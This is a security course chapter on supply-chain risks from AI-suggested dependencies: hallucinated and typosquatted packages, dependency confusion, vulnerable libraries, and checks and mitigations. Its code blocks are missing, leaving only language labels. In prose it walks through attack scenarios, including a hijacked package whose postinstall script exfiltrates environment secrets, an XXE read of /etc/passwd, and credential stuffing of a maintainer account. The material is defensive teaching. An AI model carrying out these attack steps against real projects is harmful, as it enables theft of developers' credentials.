Logo
    Login
    Hackerspace
    • Learn
    • Colleges
    • Hackers
    Career
    • Jobs
    • Applications
    Profile
    • Login as Hacker
    Vidoc Security Labs

    Safe AI Code Assistants in Production

    0 / 11 chapters0%
    Course Introduction
    The AI Coding Reality Check
    The AI Coding Boom - Why Everyone's Using It
    The Dark Side - Security Reality Check
    The Shadow AI Problem
    The Productivity Paradox
    When AI Helps vs. When It Hurts
    Understanding the Security Risks
    Data Leakage & Model Retention
    Vulnerable Code Generation Patterns
    Supply Chain & Dependency Risks
    IP & License Contamination
    The False Security Assumption
    Prompt Injection & Ecosystem Exploits
    1. Safe AI Code Assistants in Production
    2. Supply Chain & Dependency Risks

    Supply Chain & Dependency Risks

    AI coding assistants are remarkably good at solving dependency problems. Need to parse JSON? It suggests a library. Need to handle dates? It recommends a package. Building a REST API? It scaffolds an entire framework setup.

    But here's the problem: AI assistants don't verify that the packages they recommend are safe, maintained, or even real.

    They're trained on vast amounts of code from the internet, including outdated tutorials, abandoned projects, and even malicious repositories. When an AI suggests a dependency, it's making a statistical prediction based on patterns it's seen, not conducting a security audit.

    This creates a new attack surface: supply chain poisoning through AI-suggested dependencies.

    Why This Matters: The Supply Chain Reality

    Modern software development is built on dependencies. A typical web application doesn't have hundreds of dependencies — it has thousands. Every npm install, pip install, or cargo add pulls code written by strangers into your application, often with full access to your system.

    The scale is staggering:

    • Modern Node.js apps often pull in hundreds to thousands of transitive dependencies.
    • A single npm install express typically brings in dozens of packages.
    • The Python Package Index (PyPI) adds thousands of new packages every month, many unmaintained or malicious 1.
    • Security researchers continue to find thousands of malicious packages published across npm, PyPI, and RubyGems 2.

    Recent attacks demonstrate the danger:

    • event-stream incident (2018) — A popular npm package (2 million downloads/week) was compromised by a new maintainer who added malicious code to steal Bitcoin wallet credentials 3
    • UA-Parser-JS (2021) — The hijacked package (8 million downloads/week) installed cryptominers and password stealers on developer machines 4
    • PyTorch supply chain attack (2022) — Attackers uploaded a malicious dependency that exfiltrated developer credentials and secrets 5
    • Ledger crypto wallet library (2023) — A compromised version drained over $600,000 from user wallets within hours 6

    Now imagine an AI assistant that doesn't check whether packages are legitimate, actively maintained, or compromised. That's the environment we're operating in today.

    How AI Assistants Amplify Supply Chain Risk

    AI coding assistants don't have real-time package registry access. They can't check:

    • Whether a package actually exists
    • If it's been updated in the last 5 years
    • Whether it has known vulnerabilities
    • If the maintainer is trustworthy
    • Whether the package has been hijacked

    Instead, they predict likely dependencies based on training data. This leads to several dangerous patterns:

    1. Hallucinated Packages (That Don't Exist... Yet)

    One of the most insidious risks is package hallucination — when an AI suggests a dependency that doesn't exist.

    Example conversation:

    Developer: "I need to validate credit card numbers in Python"

    AI: "You can use the credit-card-validator package. Install it with: pip install credit-card-validator"

    The problem? This package might not exist. But an attacker can create it.

    This creates a supply chain attack vector:

    1. Attacker monitors AI-generated code repositories (GitHub, GitLab, etc.)
    2. Identifies commonly hallucinated package names
    3. Publishes malicious packages with those exact names
    4. Developers blindly install them based on AI recommendations

    This attack is already happening. Researchers have demonstrated it works 7:

    • Created a fake package with a name frequently suggested by AI assistants
    • Uploaded it to PyPI with malicious code
    • Within weeks, it had hundreds of downloads from developers following AI suggestions

    Real incident: In 2024, security researchers found that GitHub Copilot and ChatGPT frequently suggested the package colourama (a typosquatting variant of the legitimate colorama) for Python projects. Attackers registered this package on PyPI with credential-stealing code. Thousands of developers installed it 8.

    2. Outdated and Deprecated Packages

    AI models are trained on historical code, which means they often suggest packages that were popular but are now:

    • Deprecated and no longer maintained
    • Have known critical vulnerabilities
    • Have been superseded by better alternatives

    Example — JavaScript date handling:

    javascript

    The problems:

    • moment.js is in maintenance mode — no new features, bug fixes only 9
    • The library is huge (232 KB minified) — impacts page load performance
    • Modern alternatives like date-fns or native Intl.DateTimeFormat are better

    But the AI doesn't know this. Its training data includes millions of lines of code using Moment.js, so it keeps recommending it.

    More concerning example — cryptography:

    python

    The pycrypto library has been abandoned since 2013 and has known security vulnerabilities 10. The modern replacement is pycryptodome, but AI tools trained on older code might not know that.

    3. Vulnerable Packages with Known CVEs

    AI assistants don't consult vulnerability databases. They might suggest a package that technically solves your problem but has critical security flaws.

    Example:

    javascript

    The jsonwebtoken library has had multiple critical vulnerabilities over the years. An AI trained on code from 2020 might suggest a version with known exploits 11.

    Another example — XML parsing:

    python

    The standard library XML parser in Python is vulnerable to several attacks 12. Security-conscious developers use defusedxml, but AI might not suggest it.

    4. Malicious Typosquatting Packages

    Attackers register packages with names similar to popular libraries, hoping developers will mistype the name. AI assistants can amplify this attack by:

    • Making typos in package names
    • Suggesting regional variants (colour vs color)
    • Mixing up similar package names

    Real examples of typosquatting packages found in the wild:

    Legitimate PackageTyposquatPlatformResult
    requestsrequestPyPICredential stealer
    urllib3urllibPyPIBackdoor
    numpynumpayPyPICryptominer
    tensorflowtensowflowPyPIData exfiltration
    opencv-pythonopencvPyPIMalware installer

    In 2023, a study found over 45,000 potentially malicious packages across npm, PyPI, and RubyGems using typosquatting, combosquatting, and brandjacking techniques 2.

    How AI makes this worse:

    python

    The developer runs pip install request, which installs a malicious package instead of the legitimate requests library.

    5. Dependency Confusion Attacks

    This is a sophisticated supply chain attack where attackers exploit how package managers resolve dependencies:

    How it works:

    1. Companies use private package registries for internal libraries (e.g., @acme/auth-utils)
    2. Package managers check both private and public registries
    3. Attacker publishes a malicious package with the same name on the public registry
    4. If the public package has a higher version number, it gets installed instead

    AI assistants can accidentally leak internal package names:

    javascript

    Now the AI knows your internal package naming convention. If that context is used to train future models or if an attacker sees this in a public repository, they can:

    1. Register @acme/internal-auth on the public npm registry
    2. Publish version 99.99.99 (higher than your internal version)
    3. Wait for developers to install it

    Real incident: In 2021, a security researcher demonstrated dependency confusion by publishing packages matching internal package names used by Apple, Microsoft, PayPal, and others. The packages were downloaded over 35,000 times before being removed 13.

    6. Transitive Dependencies (The Hidden Threat)

    When you install a package, you also install all of its dependencies, and all of their dependencies, recursively. This creates a massive, often invisible attack surface.

    The risk: Even if express itself is trustworthy, any of those additional packages could be compromised. The event-stream attack happened through a transitive dependency — most developers didn't even know they were using it 3.

    AI assistants don't understand transitive dependencies. When they suggest installing a package, they're not accounting for the hundreds of transitive dependencies it might pull in.

    Real-World Attack Scenarios

    Let's walk through how these risks materialize in practice:

    Scenario 1: The Helpful AI Backdoor

    Setup:

    • Developer needs to add authentication to a Node.js app
    • Asks AI: "How do I implement JWT authentication in Express?"
    • AI suggests installing express-jwt-auth (a hallucinated package)

    Attack:

    1. Attacker monitors GitHub for AI-generated code mentioning express-jwt-auth
    2. Sees it's commonly suggested but doesn't exist
    3. Creates the package with this code:
    javascript
    1. Developer runs npm install express-jwt-auth and integrates it
    2. Application works perfectly — authentication succeeds
    3. Attacker collects all JWT tokens passing through the system

    Detection: This could go undetected for months because the authentication still works correctly. The malicious behavior is subtle and hidden.

    Scenario 2: The Vulnerable Recommendation

    Setup:

    • Developer needs to parse XML from user input
    • AI suggests using lxml in Python

    What AI suggests:

    python

    The vulnerability:

    This code is vulnerable to XML External Entity (XXE) attacks, which can lead to:

    • File disclosure — Reading /etc/passwd or application secrets
    • Server-Side Request Forgery (SSRF) — Making requests to internal services
    • Denial of Service — Billion Laughs Attack (exponential entity expansion)

    Exploit example:

    xml

    When parsed with the AI-suggested code, this XML reads and returns the contents of /etc/passwd.

    Safe version (which AI should have suggested):

    python

    Scenario 3: The Supply Chain Takeover

    Setup:

    • Developer asks AI to help with data visualization
    • AI suggests chartjs-helper (a popular but abandoned npm package)
    • Original maintainer hasn't updated it in 3 years

    Attack:

    1. Attacker researches maintainer's email (found in package.json)
    2. Attempts credential stuffing using leaked password databases
    3. Successfully accesses maintainer's npm account (using a password from a 2019 breach)
    4. Publishes version 2.0.0 with malicious code:
    javascript
    1. Developers following AI suggestions run npm install chartjs-helper
    2. The postinstall script runs automatically, exfiltrating secrets

    Impact:

    • All environment variables sent to attacker (AWS keys, database credentials, API tokens)
    • .env files from developer machines exfiltrated
    • Company secrets compromised before code even runs

    This is exactly what happened with the event-stream and UA-Parser-JS attacks 3 4.

    How to Verify AI-Suggested Dependencies

    Before installing any AI-suggested package, complete these checks:

    StepVerificationCommand/Tool✅ Safe❌ Reject
    1Package existsnpm info package-nameShows valid metadataNot found
    2Download volumeCheck weekly downloads>1,000/week<1,000/week ⚠️
    3Known vulnerabilitiesnpm audit or SnykNo high/critical CVEsHigh/Critical CVEs found
    4Active maintenanceLast publish dateUpdated within 1 year>1 year old ⚠️
    5Dependency countnpm list --all<50 total packages>50 packages ⚠️
    6Install scriptsCheck package.jsonNone or benignSuspicious scripts

    Decision Rules:

    • ❌ Any red flag → Reject immediately, find alternative
    • ⚠️ 1-2 yellow flags → Proceed with extra caution and monitoring
    • ✅ All green → Approved for installation

    This 6-step checklist takes 2-3 minutes per package but prevents supply chain compromises.

    Quick Command Reference

    Check package info:

    bash

    Scan for vulnerabilities:

    bash

    Also check:

    • Snyk Vulnerability Database
    • GitHub Advisory Database
    • National Vulnerability Database

    Advanced verification tools:

    bash

    Examine before installing:

    bash

    Red Flags in package.json

    json

    Note: Legitimate packages rarely need install scripts. If present, read them carefully.

    Mitigation Strategies: Securing Your Supply Chain

    Here's how to protect your organization from AI-amplified supply chain risks:

    1. Require Human Review for All New Dependencies

    Policy:

    • No developer may add a new dependency without approval
    • All dependencies must go through a security review process
    • AI-suggested packages require explicit verification

    Implementation:

    yaml

    2. Use Private Package Registries with Allowlists

    Option 1: npm Enterprise / GitHub Packages

    bash

    Option 2: Artifactory / Nexus with Proxying

    • Configure to proxy public registries
    • Scan all packages before they enter your registry
    • Block packages that fail security scans
    • Maintain allowlist of approved packages

    Option 3: Renovate/Dependabot with Approval Workflows

    json

    3. Implement Subresource Integrity (SRI) for CDN Assets

    If AI suggests loading libraries from CDNs, always use SRI hashes.

    Without SRI (vulnerable):

    html

    With SRI (protected):

    html

    If the CDN is compromised and delivers different code, the browser refuses to execute it.

    4. Enable Dependency Pinning and Lock Files

    Always commit lock files:

    • package-lock.json (npm)
    • yarn.lock (Yarn)
    • Pipfile.lock (Python/Pipenv)
    • Gemfile.lock (Ruby)
    • Cargo.lock (Rust)
    • go.sum (Go)

    Use exact versions in production:

    json

    5. Scan Dependencies in CI/CD Pipeline

    GitHub Actions example:

    yaml

    6. Monitor for Dependency Hijacking

    Use services that alert you when:

    • A dependency you use changes maintainers
    • A new version is published after a long gap
    • A package shows suspicious behavior (network calls, filesystem access)

    7. Implement Software Bill of Materials (SBOM)

    Generate an SBOM for every release:

    bash

    Store SBOMs alongside releases so you can:

    • Quickly identify affected systems when vulnerabilities are disclosed
    • Track exactly which dependencies are in production
    • Meet compliance requirements (EU Cyber Resilience Act, NIST SSDF)

    The AI-Specific Checklist for Dependencies

    Before accepting AI-suggested dependencies, verify the package exists on an official registry under the exact name you intend to use, is actively maintained, and links to a legitimate source repository. Scan for recent high‑severity CVEs, confirm the license is compatible, and prefer packages without install scripts or sprawling transitive trees.

    Reject immediately when you see classic red flags: brandjacked or near‑miss names, brand‑new packages presented as “standard,” negligible downloads, empty or mismatched repositories, install steps that execute network scripts, or obfuscated source code.

    When in doubt, pause for deeper review if maintenance looks stale, a single maintainer represents a clear bus factor, security issues are piling up, binaries ship in the repo, or the package requests unusual permissions or behaviors during installation.

    Key Takeaways

    Before moving to the next chapter, make sure you understand:

    • AI assistants don't verify package safety — They predict based on training data, not current security status
    • Hallucinated packages are real attack vectors — Attackers create packages with names AI commonly suggests
    • Outdated recommendations are dangerous — AI trained on old code suggests deprecated libraries with known vulnerabilities
    • Transitive dependencies multiply risk — One package can pull in hundreds of dependencies you don't see
    • Typosquatting is amplified by AI — AI might make typos or suggest similar-sounding packages
    • Dependency confusion enables supply chain attacks — Internal package names can be exploited
    • Install scripts are execution vectors — Malicious code runs automatically during npm install
    • Verification is essential — Never install AI-suggested packages without checking existence, health, and vulnerabilities
    • Lock files prevent drift — Always commit lock files to ensure consistent dependency versions
    • CI/CD scanning catches issues early — Automated security scans should run on every PR

    Sources and Further Reading

    [1] PyPI Stats – Python Package Index Statistics

    [2] Socket Security Research – Supply Chain Attack Detection & Monitoring

    [3] Snyk (2018) – Malicious code found in npm package event-stream

    [4] TrueSec (2021) – UAParser.js npm Package Supply Chain Attack: Impact and Response

    [5] BleepingComputer (2022) – PyTorch discloses malicious dependency chain compromise over holidays

    [6] BleepingComputer (2023) – Ledger dApp supply chain attack steals $600K from crypto wallets

    [7] Lasso Security (2023) – AI Hallucinations Package Risk

    [8] Imperva (2024) – Python's Colorama Typosquatting Meets 'Fade Stealer' Malware

    [9] Moment.js – Project Status: Maintenance Mode

    [10] NVD – CVE-2013-7459: PyCrypto Hash Collision Vulnerability

    [11] GitHub Advisory – CVE-2022-23529: jsonwebtoken vulnerable to signature validation bypass

    [12] OWASP – XML External Entity (XXE) Processing

    [13] Medium - Alex Birsan (2021) – Dependency Confusion: How I Hacked Into Apple, Microsoft and Dozens of Others

    Additional Resources

    • Snyk Advisor – Package health and security scores
    • deps.dev – Google's open source dependency insights
    • SLSA Framework – Supply-chain Levels for Software Artifacts
    • in-toto – Framework to secure software supply chains
    • sigstore – Signing, verification, and provenance for software
    Ready to move on?

    Mark this chapter as finished to continue

    Ready to move on?

    Mark this chapter as finished to continue

    LoginLogin to mark
    Chapter completed!
    NextGo to Next Chapter